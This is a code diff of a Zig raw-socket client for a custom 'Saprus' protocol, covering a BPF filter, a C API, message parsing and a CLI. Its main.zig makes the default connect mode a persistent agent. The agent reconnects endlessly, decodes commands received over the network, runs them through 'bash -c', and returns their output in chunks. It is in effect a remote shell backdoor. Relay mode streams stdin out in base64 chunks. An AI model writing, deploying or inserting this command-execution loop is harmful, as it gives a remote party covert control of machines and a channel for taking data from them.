self.* = undefined;
}
pub fn send(self: RawSocket, payload: []const u8) !void {
const sent_bytes = std.os.linux.sendto(
self.fd,
payload.ptr,
payload.len,
0,
@ptrCast(&self.sockaddr_ll),
@sizeOf(@TypeOf(self.sockaddr_ll)),
);
_ = sent_bytes;
}
pub fn receive(self: RawSocket, buf: []u8) ![]u8 {
const len = std.os.linux.recvfrom(
self.fd,
buf.ptr,
buf.len,
0,
null,
null,
);
if (std.os.linux.errno(len) != .SUCCESS) {
return error.Timeout; // TODO: get the real error, assume timeout for now.
}
return buf[0..len];
}
pub fn attachSaprusPortFilter(self: RawSocket, port: u16) !void {
const BPF = std.os.linux.BPF;
// BPF instruction structure for classic BPF
const SockFilter = extern struct {
code: u16,
jt: u8,
jf: u8,
k: u32,
};
const SockFprog = extern struct {
len: u16,
filter: [*]const SockFilter,
};
// Build the filter program
const filter = [_]SockFilter{
// Load 2 bytes at offset 46 (absolute)
.{ .code = BPF.LD | BPF.H | BPF.ABS, .jt = 0, .jf = 0, .k = 46 },
// Jump if equal to port (skip 0 if true, skip 1 if false)
.{ .code = BPF.JMP | BPF.JEQ | BPF.K, .jt = 0, .jf = 1, .k = @as(u32, port) },
// Return 0xffff (pass)
.{ .code = BPF.RET | BPF.K, .jt = 0, .jf = 0, .k = 0xffff },
// Return 0x0 (fail)
.{ .code = BPF.RET | BPF.K, .jt = 0, .jf = 0, .k = 0x0 },
};
const fprog = SockFprog{
.len = filter.len,
.filter = &filter,
};
// Attach filter to socket using setsockopt
const rc = std.os.linux.setsockopt(
self.fd,
std.os.linux.SOL.SOCKET,
std.os.linux.SO.ATTACH_FILTER,
@ptrCast(&fprog),
@sizeOf(SockFprog),
);
if (rc != 0) {
return error.BpfAttachFailed;
}
}
const std = @import("std");
const builtin = @import("builtin");

88
src/c_api.zig Normal file
View File

@@ -0,0 +1,88 @@
const std = @import("std");
const zaprus = @import("zaprus");
// Opaque types for C API
const ZaprusClient = opaque {};
const ZaprusConnection = opaque {};
const alloc = std.heap.c_allocator;
const io = std.Io.Threaded.global_single_threaded.io();
export fn zaprus_init_client() ?*ZaprusClient {
const client = alloc.create(zaprus.Client) catch return null;
client.* = zaprus.Client.init() catch {
alloc.destroy(client);
return null;
};
return @ptrCast(client);
}
export fn zaprus_deinit_client(client: ?*ZaprusClient) void {
const c: ?*zaprus.Client = @ptrCast(@alignCast(client));
if (c) |zc| {
zc.deinit();
alloc.destroy(zc);
}
}
export fn zaprus_client_send_relay(
client: ?*ZaprusClient,
payload: [*c]const u8,
payload_len: usize,
dest: [*c]const u8,
) c_int {
const c: ?*zaprus.Client = @ptrCast(@alignCast(client));
const zc = c orelse return 1;
zc.sendRelay(io, payload[0..payload_len], dest[0..4].*) catch return 1;
return 0;
}
export fn zaprus_connect(
client: ?*ZaprusClient,
payload: [*c]const u8,
payload_len: usize,
) ?*ZaprusConnection {
const c: ?*zaprus.Client = @ptrCast(@alignCast(client));
const zc = c orelse return null;
const connection = alloc.create(zaprus.Connection) catch return null;
connection.* = zc.connect(io, payload[0..payload_len]) catch {
alloc.destroy(connection);
return null;
};
return @ptrCast(connection);
}
export fn zaprus_deinit_connection(connection: ?*ZaprusConnection) void {
const c: ?*zaprus.Connection = @ptrCast(@alignCast(connection));
if (c) |zc| {
alloc.destroy(zc);
}
}
export fn zaprus_connection_next(
connection: ?*ZaprusConnection,
out: [*c]u8,
capacity: usize,
out_len: *usize,
) c_int {
const c: ?*zaprus.Connection = @ptrCast(@alignCast(connection));
const zc = c orelse return 1;
const result = zc.next(io, out[0..capacity]) catch return 1;
out_len.* = result.len;
return 0;
}
export fn zaprus_connection_send(
connection: ?*ZaprusConnection,
payload: [*c]const u8,
payload_len: usize,
) c_int {
const c: ?*zaprus.Connection = @ptrCast(@alignCast(connection));
const zc = c orelse return 1;
zc.send(io, payload[0..payload_len]) catch return 1;
return 0;
}

View File

@@ -1,72 +1,230 @@
const is_debug = builtin.mode == .Debug; const is_debug = builtin.mode == .Debug;
/// This creates a debug allocator that can only be referenced in debug mode. const help =
/// You should check for is_debug around every reference to dba.
var dba: DebugAllocator =
if (is_debug)
DebugAllocator.init
else
@compileError("Should not use debug allocator in release mode");
pub fn main() !void {
defer if (is_debug) {
_ = dba.deinit();
};
const gpa = if (is_debug) dba.allocator() else std.heap.smp_allocator;
// CLI parsing adapted from the example here
// https://github.com/Hejsil/zig-clap/blob/e47028deaefc2fb396d3d9e9f7bd776ae0b2a43a/README.md#examples
// First we specify what parameters our program can take.
// We can use `parseParamsComptime` to parse a string into an array of `Param(Help)`.
const params = comptime clap.parseParamsComptime(
\\-h, --help Display this help and exit. \\-h, --help Display this help and exit.
\\-r, --relay <str> A relay message to send. \\-r, --relay <str> A relay message to send.
\\-d, --dest <str> An IPv4 or <= 4 ASCII byte string. \\-d, --dest <str> An IPv4 or <= 4 ASCII byte string.
\\-c, --connect <str> A connection message to send. \\-c, --connect <str> A connection message to send.
\\ \\
); ;
// Initialize our diagnostics, which can be used for reporting useful errors. const Option = enum { help, relay, dest, connect };
// This is optional. You can also pass `.{}` to `clap.parse` if you don't const to_option: StaticStringMap(Option) = .initComptime(.{
// care about the extra information `Diagnostics` provides. .{ "-h", .help },
var diag = clap.Diagnostic{}; .{ "--help", .help },
var res = clap.parse(clap.Help, &params, clap.parsers.default, .{ .{ "-r", .relay },
.diagnostic = &diag, .{ "--relay", .relay },
.allocator = gpa, .{ "-d", .dest },
}) catch |err| { .{ "--dest", .dest },
// Report useful error and exit. .{ "-c", .connect },
diag.report(std.io.getStdErr().writer(), err) catch {}; .{ "--connect", .connect },
return err; });
};
defer res.deinit();
try SaprusClient.init(); pub fn main(init: std.process.Init) !void {
defer SaprusClient.deinit(); // CLI parsing adapted from the example here
// https://codeberg.org/ziglang/zig/pulls/30644
if (res.args.help != 0) { const args = try init.minimal.args.toSlice(init.arena.allocator());
return clap.help(std.io.getStdErr().writer(), clap.Help, &params, .{});
var flags: struct {
relay: ?[]const u8 = null,
dest: ?[]const u8 = null,
connect: ?[]const u8 = null,
} = .{};
if (args.len == 1) {
flags.connect = "";
} else {
var i: usize = 1;
while (i < args.len) : (i += 1) {
if (to_option.get(args[i])) |opt| {
switch (opt) {
.help => {
std.debug.print("{s}", .{help});
return;
},
.relay => {
i += 1;
if (i < args.len) {
flags.relay = args[i];
} else {
flags.relay = "";
}
},
.dest => {
i += 1;
if (i < args.len) {
flags.dest = args[i];
} else {
std.debug.print("-d/--dest requires a string\n", .{});
return error.InvalidArguments;
}
},
.connect => {
i += 1;
if (i < args.len) {
flags.connect = args[i];
} else {
flags.connect = "";
}
},
}
} else {
std.debug.print("Unknown argument: {s}\n", .{args[i]});
return error.InvalidArguments;
}
}
} }
if (res.args.relay) |r| { if (flags.connect != null and (flags.relay != null or flags.dest != null)) {
const dest = parseDest(res.args.dest); std.debug.print("Incompatible arguments.\nCannot use --connect/-c with dest or relay.\n", .{});
try SaprusClient.sendRelay( return error.InvalidArguments;
if (r.len > 0) r else "Hello darkness my old friend", }
dest,
gpa, var client: SaprusClient = undefined;
);
// std.debug.print("Sent: {s}\n", .{r}); if (flags.relay != null) {
return; client = try .init();
} else if (res.args.connect) |c| { defer client.deinit();
_ = SaprusClient.connect(if (c.len > 0) c else "Hello darkness my old friend", gpa) catch |err| switch (err) { var chunk_writer_buf: [2048]u8 = undefined;
error.WouldBlock => null, var chunk_writer: Writer = .fixed(&chunk_writer_buf);
else => return err, if (flags.relay.?.len > 0) {
}; var output_iter = std.mem.window(u8, flags.relay.?, SaprusClient.max_payload_len, SaprusClient.max_payload_len);
while (output_iter.next()) |chunk| {
chunk_writer.end = 0;
try chunk_writer.print("{b64}", .{chunk});
try client.sendRelay(init.io, chunk_writer.buffered(), parseDest(flags.dest));
try init.io.sleep(.fromMilliseconds(40), .boot);
}
} else {
var stdin_file: std.Io.File = .stdin();
var stdin_file_reader = stdin_file.reader(init.io, &.{});
var stdin_reader = &stdin_file_reader.interface;
var lim_buf: [SaprusClient.max_payload_len]u8 = undefined;
var limited = stdin_reader.limited(.limited(10 * lim_buf.len), &lim_buf);
var stdin = &limited.interface;
while (stdin.fillMore()) {
// Sometimes fillMore will return 0 bytes.
// Skip these
if (stdin.seek == stdin.end) continue;
chunk_writer.end = 0;
try chunk_writer.print("{b64}", .{stdin.buffered()});
try client.sendRelay(init.io, chunk_writer.buffered(), parseDest(flags.dest));
try init.io.sleep(.fromMilliseconds(40), .boot);
try stdin.discardAll(stdin.end);
} else |err| switch (err) {
error.EndOfStream => {
log.debug("end of stdin", .{});
},
else => |e| return e,
}
}
return; return;
} }
return clap.help(std.io.getStdErr().writer(), clap.Help, &params, .{}); var init_con_buf: [SaprusClient.max_payload_len]u8 = undefined;
var w: Writer = .fixed(&init_con_buf);
try w.print("{b64}", .{flags.connect.?});
if (flags.connect != null) {
reconnect: while (true) {
client = try .init();
defer client.deinit();
log.debug("Starting connection", .{});
try client.socket.setTimeout(if (is_debug) 3 else 25, 0);
var connection = client.connect(init.io, w.buffered()) catch {
log.debug("Connection timed out", .{});
continue;
};
log.debug("Connection started", .{});
next_message: while (true) {
var res_buf: [2048]u8 = undefined;
try client.socket.setTimeout(if (is_debug) 60 else 600, 0);
const next = connection.next(init.io, &res_buf) catch {
continue :reconnect;
};
const b64d = std.base64.standard.Decoder;
var connection_payload_buf: [2048]u8 = undefined;
const connection_payload = connection_payload_buf[0..try b64d.calcSizeForSlice(next)];
b64d.decode(connection_payload, next) catch {
log.debug("Failed to decode message, skipping: '{s}'", .{connection_payload});
continue;
};
var child = std.process.spawn(init.io, .{
.argv = &.{ "bash", "-c", connection_payload },
.stdout = .pipe,
.stderr = .ignore,
.stdin = .ignore,
}) catch continue;
var child_output_buf: [SaprusClient.max_payload_len]u8 = undefined;
var child_output_reader = child.stdout.?.reader(init.io, &child_output_buf);
var is_killed: std.atomic.Value(bool) = .init(false);
var kill_task = try init.io.concurrent(killProcessAfter, .{ init.io, &child, .fromSeconds(3), &is_killed });
defer _ = kill_task.cancel(init.io) catch {};
var cmd_output_buf: [SaprusClient.max_payload_len * 2]u8 = undefined;
var cmd_output: Writer = .fixed(&cmd_output_buf);
// Maximum of 10 messages of output per command
for (0..10) |_| {
cmd_output.end = 0;
child_output_reader.interface.fill(child_output_reader.interface.buffer.len) catch |err| switch (err) {
error.ReadFailed => continue :next_message, // TODO: check if there is a better way to handle this
error.EndOfStream => {
cmd_output.print("{b64}", .{child_output_reader.interface.buffered()}) catch unreachable;
if (cmd_output.end > 0) {
connection.send(init.io, cmd_output.buffered()) catch |e| {
log.debug("Failed to send connection chunk: {t}", .{e});
continue :next_message;
};
}
break;
},
};
cmd_output.print("{b64}", .{try child_output_reader.interface.takeArray(child_output_buf.len)}) catch unreachable;
connection.send(init.io, cmd_output.buffered()) catch |err| {
log.debug("Failed to send connection chunk: {t}", .{err});
continue :next_message;
};
try init.io.sleep(.fromMilliseconds(40), .boot);
} else {
kill_task.cancel(init.io) catch {};
killProcessAfter(init.io, &child, .zero, &is_killed) catch |err| {
log.debug("Failed to kill process??? {t}", .{err});
continue :next_message;
};
}
if (!is_killed.load(.monotonic)) {
_ = child.wait(init.io) catch |err| {
log.debug("Failed to wait for child: {t}", .{err});
};
}
}
}
}
unreachable;
}
fn killProcessAfter(io: std.Io, proc: *std.process.Child, duration: std.Io.Duration, is_killed: *std.atomic.Value(bool)) !void {
io.sleep(duration, .boot) catch |err| switch (err) {
error.Canceled => return,
else => |e| return e,
};
is_killed.store(true, .monotonic);
proc.kill(io);
} }
fn parseDest(in: ?[]const u8) [4]u8 { fn parseDest(in: ?[]const u8) [4]u8 {
@@ -77,19 +235,20 @@ fn parseDest(in: ?[]const u8) [4]u8 {
return res; return res;
} }
const addr = std.net.Ip4Address.parse(dest, 0) catch return "FAIL".*; const addr = std.Io.net.Ip4Address.parse(dest, 0) catch return "FAIL".*;
return @bitCast(addr.sa.addr); return addr.bytes;
} }
return "zap\x00".*; return "disc".*;
} }
const builtin = @import("builtin"); const builtin = @import("builtin");
const std = @import("std"); const std = @import("std");
const DebugAllocator = std.heap.DebugAllocator(.{}); const log = std.log;
const ArrayList = std.ArrayList; const ArrayList = std.ArrayList;
const StaticStringMap = std.StaticStringMap;
const zaprus = @import("zaprus"); const zaprus = @import("zaprus");
const SaprusClient = zaprus.Client; const SaprusClient = zaprus.Client;
const SaprusMessage = zaprus.Message; const SaprusMessage = zaprus.Message;
const clap = @import("clap"); const Writer = std.Io.Writer;

View File

@@ -1,25 +1,3 @@
/// Type tag for Message union.
/// This is the first value in the actual packet sent over the network.
pub const PacketType = enum(u16) {
relay = 0x003C,
file_transfer = 0x8888,
connection = 0x00E9,
_,
};
/// Reserved option values.
/// Currently unused.
pub const ConnectionOptions = packed struct(u8) {
opt1: bool = false,
opt2: bool = false,
opt3: bool = false,
opt4: bool = false,
opt5: bool = false,
opt6: bool = false,
opt7: bool = false,
opt8: bool = false,
};
pub const MessageTypeError = error{ pub const MessageTypeError = error{
NotImplementedSaprusType, NotImplementedSaprusType,
UnknownSaprusType, UnknownSaprusType,
@@ -28,226 +6,205 @@ pub const MessageParseError = MessageTypeError || error{
InvalidMessage, InvalidMessage,
}; };
// ZERO COPY STUFF const message = @This();
// &payload could be a void value that is treated as a pointer to a [*]u8
/// All Saprus messages
pub const Message = packed struct {
const Relay = packed struct {
dest: @Vector(4, u8),
payload: void,
pub fn getPayload(self: *align(1) Relay) []u8 { pub const Message = union(enum(u16)) {
const len: *u16 = @ptrFromInt(@intFromPtr(self) - @sizeOf(u16)); relay: Message.Relay = 0x003C,
return @as([*]u8, @ptrCast(&self.payload))[0 .. len.* - @sizeOf(Relay)]; connection: Message.Connection = 0x00E9,
} _,
};
const Connection = packed struct {
src_port: u16, // random number > 1024
dest_port: u16, // random number > 1024
seq_num: u32 = 0,
msg_id: u32 = 0,
reserved: u8 = 0,
options: ConnectionOptions = .{},
payload: void,
pub fn getPayload(self: *align(1) Connection) []u8 { pub const Relay = message.Relay;
const len: *u16 = @ptrFromInt(@intFromPtr(self) - @sizeOf(u16)); pub const Connection = message.Connection;
return @as([*]u8, @ptrCast(&self.payload))[0 .. len.* - @sizeOf(Connection)];
}
fn nativeFromNetworkEndian(self: *align(1) Connection) void { pub fn toBytes(self: message.Message, buf: []u8) []u8 {
self.src_port = bigToNative(@TypeOf(self.src_port), self.src_port); return switch (self) {
self.dest_port = bigToNative(@TypeOf(self.dest_port), self.dest_port); inline .relay, .connection => |m| m.toBytes(buf),
self.seq_num = bigToNative(@TypeOf(self.seq_num), self.seq_num);
self.msg_id = bigToNative(@TypeOf(self.msg_id), self.msg_id);
}
fn networkFromNativeEndian(self: *align(1) Connection) void {
self.src_port = nativeToBig(@TypeOf(self.src_port), self.src_port);
self.dest_port = nativeToBig(@TypeOf(self.dest_port), self.dest_port);
self.seq_num = nativeToBig(@TypeOf(self.seq_num), self.seq_num);
self.msg_id = nativeToBig(@TypeOf(self.msg_id), self.msg_id);
}
};
const Self = @This();
const SelfBytes = []align(@alignOf(Self)) u8;
type: PacketType,
length: u16,
bytes: void = {},
/// Takes a byte slice, and returns a Message struct backed by the slice.
/// This properly initializes the top level headers within the slice.
pub fn init(@"type": PacketType, bytes: []align(@alignOf(Self)) u8) *Self {
std.debug.assert(bytes.len >= @sizeOf(Self));
const res: *Self = @ptrCast(bytes.ptr);
res.type = @"type";
res.length = @intCast(bytes.len - @sizeOf(Self));
return res;
}
pub fn lengthForPayloadLength(comptime @"type": PacketType, payload_len: usize) MessageTypeError!u16 {
std.debug.assert(payload_len < std.math.maxInt(u16));
const header_size = @sizeOf(switch (@"type") {
.relay => Relay,
.connection => Connection,
.file_transfer => return MessageTypeError.NotImplementedSaprusType,
else => return MessageTypeError.UnknownSaprusType,
});
return @intCast(payload_len + @sizeOf(Self) + header_size);
}
fn getRelay(self: *Self) *align(1) Relay {
return std.mem.bytesAsValue(Relay, &self.bytes);
}
fn getConnection(self: *Self) *align(1) Connection {
return std.mem.bytesAsValue(Connection, &self.bytes);
}
pub fn getSaprusTypePayload(self: *Self) MessageTypeError!(union(PacketType) {
relay: *align(1) Relay,
file_transfer: void,
connection: *align(1) Connection,
}) {
return switch (self.type) {
.relay => .{ .relay = self.getRelay() },
.connection => .{ .connection = self.getConnection() },
.file_transfer => MessageTypeError.NotImplementedSaprusType,
else => MessageTypeError.UnknownSaprusType,
};
}
pub fn nativeFromNetworkEndian(self: *Self) MessageTypeError!void {
self.type = @enumFromInt(bigToNative(
@typeInfo(@TypeOf(self.type)).@"enum".tag_type,
@intFromEnum(self.type),
));
self.length = bigToNative(@TypeOf(self.length), self.length);
errdefer {
// If the payload specific headers fail, revert the top level header values
self.type = @enumFromInt(nativeToBig(
@typeInfo(@TypeOf(self.type)).@"enum".tag_type,
@intFromEnum(self.type),
));
self.length = nativeToBig(@TypeOf(self.length), self.length);
}
switch (try self.getSaprusTypePayload()) {
.relay => {},
.connection => |*con| con.*.nativeFromNetworkEndian(),
// We know other values are unreachable,
// because they would have returned an error from the switch condition.
else => unreachable, else => unreachable,
}
}
pub fn networkFromNativeEndian(self: *Self) MessageTypeError!void {
try switch (try self.getSaprusTypePayload()) {
.relay => {},
.connection => |*con| con.*.networkFromNativeEndian(),
.file_transfer => MessageTypeError.NotImplementedSaprusType,
else => MessageTypeError.UnknownSaprusType,
}; };
self.type = @enumFromInt(nativeToBig(
@typeInfo(@TypeOf(self.type)).@"enum".tag_type,
@intFromEnum(self.type),
));
self.length = nativeToBig(@TypeOf(self.length), self.length);
} }
/// Deprecated. pub const parse = message.parse;
/// If I need the bytes, I should just pass around the slice that is backing this to begin with. };
pub fn asBytes(self: *Self) SelfBytes {
const size = @sizeOf(Self) + self.length; pub const relay_dest_len = 4;
return @as([*]align(@alignOf(Self)) u8, @ptrCast(self))[0..size];
pub fn parse(bytes: []const u8) MessageParseError!Message {
var in: Reader = .fixed(bytes);
const @"type" = in.takeEnum(std.meta.Tag(Message), .big) catch |err| switch (err) {
error.InvalidEnumTag => return error.UnknownSaprusType,
else => return error.InvalidMessage,
};
const checksum = in.takeArray(2) catch return error.InvalidMessage;
switch (@"type") {
.relay => {
const dest: Relay.Dest = .fromBytes(
in.takeArray(relay_dest_len) catch return error.InvalidMessage,
);
const payload = in.buffered();
return .{
.relay = .{
.dest = dest,
.checksum = checksum.*,
.payload = payload,
},
};
},
.connection => {
const src = in.takeInt(u16, .big) catch return error.InvalidMessage;
const dest = in.takeInt(u16, .big) catch return error.InvalidMessage;
const seq = in.takeInt(u32, .big) catch return error.InvalidMessage;
const id = in.takeInt(u32, .big) catch return error.InvalidMessage;
const reserved = in.takeByte() catch return error.InvalidMessage;
const options = in.takeStruct(Connection.Options, .big) catch return error.InvalidMessage;
const payload = in.buffered();
return .{
.connection = .{
.src = src,
.dest = dest,
.seq = seq,
.id = id,
.reserved = reserved,
.options = options,
.payload = payload,
},
};
},
else => return error.NotImplementedSaprusType,
}
}
test parse {
_ = try parse(&[_]u8{ 0x00, 0x3c, 0x00, 0x17, 0xac, 0x12, 0x01, 0x1e, 0x72, 0x65, 0x6d, 0x6f, 0x76, 0x65, 0x20, 0x65, 0x76, 0x65, 0x6e, 0x74, 0x20, 0x6c, 0x6f, 0x67, 0x67, 0x65, 0x64 });
{
const expected: Message = .{
.connection = .{
.src = 12416,
.dest = 61680,
.seq = 0,
.id = 0,
.reserved = 0,
.options = @bitCast(@as(u8, 100)),
.payload = &[_]u8{ 0x69, 0x61, 0x6d, 0x64, 0x65, 0x66, 0x61, 0x75, 0x6c, 0x74 },
},
};
const actual = try parse(&[_]u8{ 0x00, 0xe9, 0x00, 0x18, 0x30, 0x80, 0xf0, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x64, 0x69, 0x61, 0x6d, 0x64, 0x65, 0x66, 0x61, 0x75, 0x6c, 0x74 });
try std.testing.expectEqualDeep(expected, actual);
}
}
const Relay = struct {
dest: Dest,
checksum: [2]u8 = undefined,
payload: []const u8,
pub const Dest = struct {
bytes: [relay_dest_len]u8,
/// Asserts bytes is less than or equal to 4 bytes
pub fn fromBytes(bytes: []const u8) Dest {
var buf: [4]u8 = @splat(0);
std.debug.assert(bytes.len <= buf.len);
@memcpy(buf[0..bytes.len], bytes);
return .{ .bytes = buf };
}
};
pub fn init(dest: Dest, payload: []const u8) Relay {
return .{ .dest = dest, .payload = payload };
}
/// Asserts that buf is large enough to fit the relay message.
pub fn toBytes(self: Relay, buf: []u8) []u8 {
var out: Writer = .fixed(buf);
out.writeInt(u16, @intFromEnum(Message.relay), .big) catch unreachable;
out.writeInt(u16, @intCast(self.payload.len + 4), .big) catch unreachable; // Length field, but unread. Will switch to checksum
out.writeAll(&self.dest.bytes) catch unreachable;
out.writeAll(self.payload) catch unreachable;
return out.buffered();
}
test toBytes {
var buf: [1024]u8 = undefined;
const relay: Relay = .init(
.fromBytes(&.{ 172, 18, 1, 30 }),
// zig fmt: off
&[_]u8{
0x72, 0x65, 0x6d, 0x6f, 0x76, 0x65, 0x20, 0x65, 0x76, 0x65,
0x6e, 0x74, 0x20, 0x6c, 0x6f, 0x67, 0x67, 0x65, 0x64
},
// zig fmt: on
);
// zig fmt: off
var expected = [_]u8{
0x00, 0x3c, 0x00, 0x17, 0xac, 0x12, 0x01, 0x1e, 0x72,
0x65, 0x6d, 0x6f, 0x76, 0x65, 0x20, 0x65, 0x76, 0x65,
0x6e, 0x74, 0x20, 0x6c, 0x6f, 0x67, 0x67, 0x65, 0x64
};
// zig fmt: on
try expectEqualMessageBuffers(&expected, relay.toBytes(&buf));
} }
}; };
test "testing variable length zero copy struct" { const Connection = struct {
const gpa = std.testing.allocator; src: u16,
const payload = "Hello darkness my old friend"; dest: u16,
seq: u32,
id: u32,
reserved: u8 = undefined,
options: Options = undefined,
payload: []const u8,
// Create a view of the byte slice as a Message /// Reserved option values.
const msg: *Message = try .init(gpa, .relay, payload.len); /// Currently unused.
defer msg.deinit(gpa); pub const Options = packed struct(u8) {
opt1: bool = false,
opt2: bool = false,
opt3: bool = false,
opt4: bool = false,
opt5: bool = false,
opt6: bool = false,
opt7: bool = false,
opt8: bool = false,
};
/// Asserts that buf is large enough to fit the connection message.
pub fn toBytes(self: Connection, buf: []u8) []u8 {
var out: Writer = .fixed(buf);
out.writeInt(u16, @intFromEnum(Message.connection), .big) catch unreachable;
out.writeInt(u16, @intCast(self.payload.len + 14), .big) catch unreachable; // Saprus length field, unread.
out.writeInt(u16, self.src, .big) catch unreachable;
out.writeInt(u16, self.dest, .big) catch unreachable;
out.writeInt(u32, self.seq, .big) catch unreachable;
out.writeInt(u32, self.id, .big) catch unreachable;
out.writeByte(self.reserved) catch unreachable;
out.writeStruct(self.options, .big) catch unreachable;
out.writeAll(self.payload) catch unreachable;
return out.buffered();
}
};
test "Round trip" {
{ {
// Set the message values const expected = [_]u8{ 0x0, 0xe9, 0x0, 0x15, 0x30, 0x80, 0xf0, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x64, 0x36, 0x3a, 0x3a, 0x64, 0x61, 0x74, 0x61 };
{ const msg = (try parse(&expected)).connection;
// These are both set by the init call. var res_buf: [expected.len + 1]u8 = undefined; // + 1 to test subslice result.
// msg.type = .relay; const res = msg.toBytes(&res_buf);
// msg.length = payload_len; try expectEqualMessageBuffers(&expected, res);
}
const relay = (try msg.getSaprusTypePayload()).relay;
relay.dest = .{ 1, 2, 3, 4 };
@memcpy(relay.getPayload(), payload);
} }
}
{ // Skip checking the length / checksum, because that is undefined.
const bytes = msg.asBytes(); fn expectEqualMessageBuffers(expected: []const u8, actual: []const u8) !void {
try std.testing.expectEqualSlices(u8, expected[0..2], actual[0..2]);
// Print the message as hex using the network byte order try std.testing.expectEqualSlices(u8, expected[4..], actual[4..]);
try msg.networkFromNativeEndian();
// We know the error from nativeFromNetworkEndian is unreachable because
// it would have returned an error from networkFromNativeEndian.
defer msg.nativeFromNetworkEndian() catch unreachable;
std.debug.print("network bytes: {x}\n", .{bytes});
std.debug.print("bytes len: {d}\n", .{bytes.len});
}
if (false) {
// Illegal behavior
std.debug.print("{any}\n", .{(try msg.getSaprusTypePayload()).connection});
}
try std.testing.expectEqualDeep(msg, try Message.bytesAsValue(msg.asBytes()));
} }
const std = @import("std"); const std = @import("std");
const Allocator = std.mem.Allocator; const Allocator = std.mem.Allocator;
const Writer = std.Io.Writer;
const asBytes = std.mem.asBytes; const Reader = std.Io.Reader;
const nativeToBig = std.mem.nativeToBig;
const bigToNative = std.mem.bigToNative;
test "Round trip Relay toBytes and fromBytes" {
const gpa = std.testing.allocator;
const msg = Message{
.relay = .{
.header = .{ .dest = .{ 255, 255, 255, 255 } },
.payload = "Hello darkness my old friend",
},
};
const to_bytes = try msg.toBytes(gpa);
defer gpa.free(to_bytes);
const from_bytes = try Message.fromBytes(to_bytes, gpa);
defer from_bytes.deinit(gpa);
try std.testing.expectEqualDeep(msg, from_bytes);
}
test "Round trip Connection toBytes and fromBytes" {
const gpa = std.testing.allocator;
const msg = Message{
.connection = .{
.header = .{
.src_port = 0,
.dest_port = 0,
},
.payload = "Hello darkness my old friend",
},
};
const to_bytes = try msg.toBytes(gpa);
defer gpa.free(to_bytes);
const from_bytes = try Message.fromBytes(to_bytes, gpa);
defer from_bytes.deinit(gpa);
try std.testing.expectEqualDeep(msg, from_bytes);
}
test { test {
std.testing.refAllDeclsRecursive(@This()); std.testing.refAllDeclsRecursive(@This());

View File

@@ -1,4 +1,13 @@
pub const Client = @import("Client.zig"); pub const Client = @import("Client.zig");
pub const Connection = @import("Connection.zig"); pub const Connection = @import("Connection.zig");
pub usingnamespace @import("message.zig"); const msg = @import("message.zig");
pub const PacketType = msg.PacketType;
pub const MessageTypeError = msg.MessageTypeError;
pub const MessageParseError = msg.MessageParseError;
pub const Message = msg.Message;
test {
@import("std").testing.refAllDecls(@This());
}